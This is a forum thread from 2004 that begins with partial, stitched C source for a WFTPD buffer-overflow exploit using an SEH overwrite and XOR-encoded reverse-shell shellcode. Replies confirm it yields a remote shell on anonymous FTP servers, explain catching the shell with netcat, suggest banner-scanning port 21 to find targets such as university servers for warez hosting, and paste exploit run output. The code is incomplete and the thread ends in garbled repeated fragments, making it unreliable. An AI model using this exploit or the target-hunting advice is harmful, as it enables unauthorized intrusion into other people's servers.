/* * WFTPD buffer overflow exploit, (c) axl 2004, rdxaxl@hotmail.com * Discovered by the very same guy :p * * Tested WFTPD versions: * * - WFTPD Pro Server 3.21 Release 1 (trial) (latest version) * - WFTPD Pro Server 3.20 Release 2 (trial) * - WFTPD Server 3.21 Release 1 (trial) (latest version) * - WFTPD Server 3.10 Release 1 (trial) * * Tested exploit with these remote operating systems: * * - Windows XP Pro, SP1 * * Should be very easy to support other Windows OSes. You may only have * to update ret_addr. */
#ifdef OLDCODE static char* ret_addr = "\xAC\x9C\xEC\x77"; // kernel32.dll 5.1.2600.1106, (WinXP Pro SP1, EN) => pop reg / pop reg / ret #else /* See the comment in exploit() for the reasons I chose this address */ static char* ret_addr = "\x5B\xC0\xEB\x77"; // kernel32.dll 5.1.2600.1106, (WinXP Pro SP1, EN) => pop reg / pop reg / ret #endif
while (1) { if (!isrd(s)) return 1; if (recv(s, inbuf, sizeof(inbuf), 0) < 0) return 0; } }
int get_reply_code(SOCKET s) { char line[MAXLINE];
if (!get_line(s, line, sizeof(line))) { printf("[-] Could not get status code\n"); return -1; }
char c = line[3]; line[3] = 0; int code; if (!(c == ' ' || c == '-') || strlen(line) != 3 || !(code = atoi(line))) { printf("[-] Weird reply\n"); return -1; }
char endline[4]; memcpy(endline, line, 3); endline[3] = ' '; if (c == '-') { while (1) { if (!get_line(s, line, sizeof(line))) { printf("[-] Could not get next line\n"); return -1; } if (!memcmp(line, endline, sizeof(endline))) break; } }
return code; }
int sendb(SOCKET s, const char* buf, int len, int flags) { while (len) { int l = send(s, buf, len, flags); if (l <= 0) break; len -= l; buf += l; }
return len == 0; }
int sends(SOCKET s, const char* buf, int flags) { return sendb(s, buf, (int)strlen(buf), flags); }
int is_valid_char(char c) { return c != 0 && c != '\n' && c != ' '; }
int add_bytes(void* dst, int& dstoffs, int dstlen, const void* src, int srclen) { if (dstoffs + srclen > dstlen || dstoffs + srclen < dstoffs) { printf("[-] Buffer overflow;)\n"); return 0; }
int check_invd_bytes(const char* name, const void* buf, int buflen) { const char* b = (const char*)buf;
for (int i = 0; i < buflen; i++) { if (!is_valid_char(b[i])) { printf("[-] %s[%u] (%02X) cannot contain bytes 00h, 0Ah, or 20h\n", name, i, b[i]); return 0; } }
return 1; }
int enc_byte(char& c, char& k) { for (int i = 0; i < 0x100; i++) { if (!is_valid_char(c ^ i) || !is_valid_char(i)) continue;
c ^= i; k = i; return 1; }
printf("[-] Could not find encryption key for byte %02X\n", c); return 0; }
int get_enc_key(char* buf, int size, int offs, int step) { for (int i = 0; i < 0x100; i++) { if (!is_valid_char(i)) continue;
for (int j = offs; j < size; j += step) { if (!is_valid_char(buf[j] ^ i)) break; } if (j < size) continue;
return i; }
printf("[-] Could not find an encryption key\n"); return -1; }
int exploit(SOCKET s, unsigned long sip, unsigned short sport) { printf("[+] Trying buffer overflow + using SEH handler\n");
for (int i = 0; i < 4; i++) { int k = get_enc_key(&shellcode[shlc_offs_encstart], shlc_offs_encend-shlc_offs_encstart, i, 4); if (k < 0) __leave; shellcode[shlc_offs_enckey+i] = k; } printf("[+] Shellcode encryption key = %02X%02X%02X%02X\n", shellcode[shlc_offs_enckey+3], shellcode[shlc_offs_enckey+2], shellcode[shlc_offs_enckey+1], shellcode[shlc_offs_enckey]); for (int i = 0; i < shlc_offs_encend-shlc_offs_encstart; i++) shellcode[shlc_offs_encstart+i] ^= shellcode[shlc_offs_enckey + i % 4];
int main(int argc, char** argv) { printf("WFTPD <= v3.21r1 buffer overflow exploit, (c) axl 2004, rdxaxl@hotmail.com\n");
WSADATA wsa; if (WSAStartup(0x0202, &wsa)) return 1;
if (argc < 5) show_help(argv[0]);
unsigned long ip = ntohl(inet_addr(argv[1])); unsigned short port = (unsigned short)atoi(argv[2]); unsigned long sip = ntohl(inet_addr(argv[3])); unsigned short sport = (unsigned short)atoi(argv[4]); const char* username = "anonymous"; const char* userpass = "axl";
for (int i = 5; i < argc; i++) { if (!strcmp(argv[i], "-u") && i + 1 < argc) { username = argv[++i]; } else if (!strcmp(argv[i], "-p") && i + 1 < argc) { userpass = argv[++i]; } else if (!strcmp(argv[i], "-v") && i + 1 < argc) { if (!stricmp(argv[i+1], "p321")) ftpver = WFTPD_PRO_321_TRIAL; else if (!stricmp(argv[i+1], "p320")) ftpver = WFTPD_PRO_320_TRIAL; else if (!stricmp(argv[i+1], "321")) ftpver = WFTPD_321_TRIAL; else if (!stricmp(argv[i+1], "310")) ftpver = WFTPD_310_TRIAL; else show_help(argv[0]); i++; } else show_help(argv[0]); }
if (!ip || !port || !sip || !sport) show_help(argv[0]);
isn't that winsock??? a little bit c-knowledge is needed to compile sources.
usch
Feb 29 2004, 02:49 PM
did some scanns on several universities but did only find 1 WFTPD but it was the wrong version and not anonymous. so i can`t recommend it for all they who want to use them as warez servers
hrm. im getting tired of this... :|. You get one error, try somthing else. then somthing else, then somthing else, THEN goto www.google.com and readup on the headers and the errors, sometimes i feel that the nice people here lookafter the lazy and uncapable like babies, being hand fed...
hey TheRealGiant nice that u post the sploit. but the link doesnt work. i got a jpg file?!
edit:
ok link worx now thx alot!
TheRealGiant
Feb 29 2004, 04:33 PM
fixed
linuxwolf
Feb 29 2004, 04:39 PM
Now everyone bow down to him and say thank you for the god damn baby mush... >< A:OEGH:OIE@PIG@POj!~@PI!")(*£")(*&"
x1`
Feb 29 2004, 05:16 PM
is this remote shell then ? and it should work for anonymous servers?
usch
Feb 29 2004, 06:03 PM
yes it is remote shell and works for anonymous
AlexeyG
Feb 29 2004, 09:30 PM
any banner scan out there yet?
usch
Mar 1 2004, 05:58 AM
use dsns (www.dsns.net) , configure it to scan on port 21 (get banner) [*WFTPD*] and start scanning,if u want i can write a tutorial for you
night^man
Mar 1 2004, 07:06 AM
were i can get this Visual C++ ?
linuxwolf
Mar 1 2004, 07:56 AM
go buy it.
AlexeyG
Mar 1 2004, 03:38 PM
QUOTE (usch @ Mar 1 2004, 05:58 AM)
use dsns (www.dsns.net) , configure it to scan on port 21 (get banner) [*WFTPD*] and start scanning,if u want i can write a tutorial for you
lol, Thank you but your explanation is enough
linuxwolf
Mar 1 2004, 03:40 PM
. Also there are plenty of banner scanners out there for nix and windows, i mean, if you want one in mirc, ask,
(Just to clear up any confusion, i script, (perl, mirc, php) and no, do not use mirc on windows, it's a thing called wine. , The only time you'll catch me on windows i playing cs or ut2k4 beta demo.... )
usch
Mar 1 2004, 04:20 PM
why do you play cs at windows?isn`t it for linux too?
OldSkool
Mar 1 2004, 04:23 PM
[+] Connecting to x.x.x.x:21... [+] Connected [+] Logging in... [+] Logged in [+] Trying buffer overflow + using SEH handler [+] Shellcode encryption key = 05050507 [+] Sending shellcode which will connect to x.x.x.x:x... [+] Shellcode sent successfully [+] Santa's watching you!
i am connected to a wtfp account in flashfxp but bot sure what some stuff in the exploit means
what does these mean
<sip> <sport>
whats 321:p320:321:310 at the end as well ?
also do u do -u anonymous -p anonymous ?
usch
Mar 1 2004, 06:34 PM
sip und sport means the ip and the port your computer is listening on.use netcat -v -l -s yourip -p yourport it will recieve a shell wehen succesfully exploited
and it should be -p anonymous -u anyemail@adress.com
Nightdemon
Mar 2 2004, 02:48 PM
QUOTE (OldSkool @ Mar 1 2004, 04:23 PM)
[+] Connecting to x.x.x.x:21... [+] Connected [+] Logging in... [+] Logged in [+] Trying buffer overflow + using SEH handler [+] Shellcode encryption key = 05050507 [+] Sending shellcode which will connect to x.x.x.x:x... [+] Shellcode sent successfully [+] Santa's watching you!
everything looked the same like this, but after [+] Santa's watching you!, it stopped Is that coz it's not a wftpd server, I didn't receive the shell, or what... tell me plz!
guy12
Mar 2 2004, 07:56 PM
have anybody ever found this ftp server in the wild ;-) ???
beenal
Mar 2 2004, 11:07 PM
QUOTE (Dickybob20 @ Mar 1 2004, 05:18 PM)
whats 321:p320:321:310 at the end as well ?
maybe you'll find out when you read the sourcecode
QUOTE (Nightdemon @ Mar 2 2004, 02:48 PM)
everything looked the same like this, but after [+] Santa's watching you!, it stopped Is that coz it's not a wftpd server, I didn't receive the shell, or what... tell me plz!
maybe you'll find out when you read the sourcecode
jesus
usch
Mar 3 2004, 01:20 PM
CODE
whats 321:p320:321:310 at the end as well ?
these are the versions of course oO
toost
Mar 5 2004, 11:18 AM
i got a little problem in here
installed wftpd localy version 3.21 (release 1)
enabled anonymous login
set some settings, started it..
tried to login anonymous, worked...
then started the exploit, runs trough it totaly so it says sending shellcode to (other ip in network).. On the other pc i have my nc running and listining, and it is NOT connecting to my nc.exe, i've no firewall no nutting... anyone got a tip in here ?
DumpZ
Mar 5 2004, 11:24 AM
Are u behind a NAT ? cuz most of the time allot of sploits which drop a shell doens't work if ur behind a NAT.
toost
Mar 5 2004, 11:29 AM
yes i'm but i did it localy so its internal, its passing the nat like that
thx alot!
but your explanation is enough 
. Also there are plenty of banner scanners out there for nix and windows, i mean, if you want one in mirc, ask, 
